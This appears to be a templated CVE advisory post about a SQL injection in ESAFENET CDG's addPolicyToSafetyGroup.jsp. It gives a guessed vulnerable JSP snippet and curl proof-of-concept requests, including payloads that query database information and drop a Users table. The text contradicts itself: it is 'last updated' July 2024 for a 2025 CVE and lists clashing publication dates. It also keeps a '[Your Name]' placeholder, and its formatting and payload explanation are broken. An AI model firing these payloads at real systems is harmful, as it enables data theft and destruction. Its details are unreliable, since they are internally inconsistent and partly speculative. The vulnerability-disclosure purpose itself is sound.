CVE CyberSecurity Database News

CVE-2025-1158 - Critical SQL Injection Vulnerability in ESAFENET CDG 5.6.3.154.205_20250114 ([addPolicyToSafetyGroup.jsp] Exploit Details)

Poster -

*Last updated: July 2024*
*Severity: Critical (CVSSv3.1: 9.8)*

Overview

A severe vulnerability, CVE-2025-1158, has been discovered in the ESAFENET CDG platform, specifically in version 5.6.3.154.205_20250114. This vulnerability stems from insufficient input validation in the addPolicyToSafetyGroup.jsp file, particularly through the safetyGroupId parameter. Exploiting this flaw allows remote attackers to perform SQL injection attacks, potentially leading to complete database compromise.

What Is ESAFENET CDG?

ESAFENET CDG is a safety and compliance management software suite commonly used by enterprises for complex policy enforcement and group management. Its broad deployment in sensitive industries makes such vulnerabilities extremely impactful.

Vulnerable Parameter: safetyGroupId

- Attack Vector: Remote / Network

Impact: Full database access, data leakage, modification, and potential command execution.

The issue is that the safetyGroupId argument in addPolicyToSafetyGroup.jsp is not sanitized before being concatenated into a SQL statement. Malicious input can thus change the logic of the query.

Let's take a look at a likely vulnerable code snippet

<%@ page import="java.sql.*" %>
<%
    String safetyGroupId = request.getParameter("safetyGroupId");
    String policyId = request.getParameter("policyId");
    Connection conn = ... // Connect to DB

    String query = "INSERT INTO PolicyGroups (safetyGroupId, policyId) VALUES (" 
                   + safetyGroupId + ", " + policyId + ")";
    Statement stmt = conn.createStatement();
    stmt.executeUpdate(query);
%>

What's wrong here?
User input (safetyGroupId) is injected directly into the SQL query without validation or prepared statements, making SQL injection possible.

Proof-of-Concept (PoC) Exploit

An attacker can exploit the vulnerability by sending a crafted HTTP request to the vulnerable endpoint.

Exploit example via curl

curl "http://TARGET_HOST/addPolicyToSafetyGroup.jsp?safetyGroupId=1%20OR%201=1--&policyId=2";

What Happens:

The backend query would become

INSERT INTO PolicyGroups (safetyGroupId, policyId) VALUES (1 OR 1=1--, 2)

`bash

curl "http://TARGET_HOST/addPolicyToSafetyGroup.jsp?safetyGroupId=1);SELECT+user(),database();--&policyId=2"

`bash

curl "http://TARGET_HOST/addPolicyToSafetyGroup.jsp?safetyGroupId=1);DROP+TABLE+Users;--&policyId=2"

`

This demonstrates how an attacker could chain together requests to view sensitive data or destroy critical tables.

Full database compromise: The attacker may read, modify, or delete sensitive information.

- Privilege escalation: Gain administrative access or even execute dangerous commands if the DBMS allows.

Exploit published: June 2025

Despite multiple contact attempts, *no response* was received from ESAFENET.

Update: No official patch is available as of this writing.

- Workaround: If updating is not possible, restrict network access to the system and use a web application firewall (WAF) to block malicious requests.

References

- CVE-2025-1158 on NIST NVD (when published)
- SQL Injection Explanation by OWASP
- Related issues in ESAFENET products on Exploit-DB

Conclusion

CVE-2025-1158 highlights the persistent danger of SQL injection and the vital need for secure coding practices. If you use ESAFENET CDG, check your version and secure your installations immediately. Pressure on the vendor for a fix is urgently needed, given the lack of official response.


Original research, exploit details and code review by [Your Name, Security Analyst].
*This post is exclusive and written in clear American English for reader accessibility.*

Timeline

Published on: 02/10/2025 22:15:37 UTC